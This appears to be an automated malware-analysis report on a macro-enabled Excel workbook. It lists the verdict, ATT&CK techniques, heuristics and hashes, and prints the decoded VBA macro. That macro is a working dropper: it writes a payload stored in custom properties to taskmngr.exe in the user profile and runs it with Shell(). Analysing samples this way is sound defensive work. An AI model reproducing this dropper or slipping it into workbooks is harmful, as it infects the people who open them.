MALICIOUS
196
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The sample is an Office document containing a Workbook_Open macro that is designed to execute automatically. The macro attempts to write a payload from custom properties into a file named 'taskmngr.exe' in the user's profile directory and then execute it using the Shell() function. The presence of a Workbook_Open macro and the use of Shell() strongly indicate a macro-based downloader.
Heuristics 7
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Hidden worksheet (veryHidden) low OOXML_HIDDEN_SHEETExcel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1837 bytes |
SHA-256: 96ab0391f90cf5ce48a70d407917e1e34aa3e69d3f9138317ded6826d4100479 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open2()
Dim sFileText As String
Dim allFIleText As String
iFileNo = FreeFile
allFIleText = ""
sFileText = ""
For Each ws In ThisWorkbook.Worksheets
If ws.Name <> "Start" Then
ws.Visible = xlSheetVisible
End If
Next ws
Sheets("Start").Visible = xlVeryHidden
Set cp = Sheet1.CustomProperties
allFIleText = Sheet1.CustomProperties.Item(1).Value
Dim TestArray() As String
TestArray = Split(allFIleText, "|")
Dim i As Long
Dim filename As String
filename = Environ("USERPROFILE") & "\taskmngr.exe"
If Not Dir(filename) <> "" Then
Open filename For Binary Lock Read Write As #2
For i = 0 To 8191
Put #2, , CByte(TestArray(i))
Next
Close #2
End If
Dim RetVal As Long
RetVal = Shell(filename, 1)
End Sub
Sub ScheduleAfter()Dim Workbook_Open As Datetimeout = Now() + TimeValue("00:00:10")Application.OnTime timeout, "Workbook_Open2"End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 12800 bytes |
SHA-256: c12193f586fc4d8566354c8cb92fc93dfa5f339b40f91c724303080d1e485f94 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.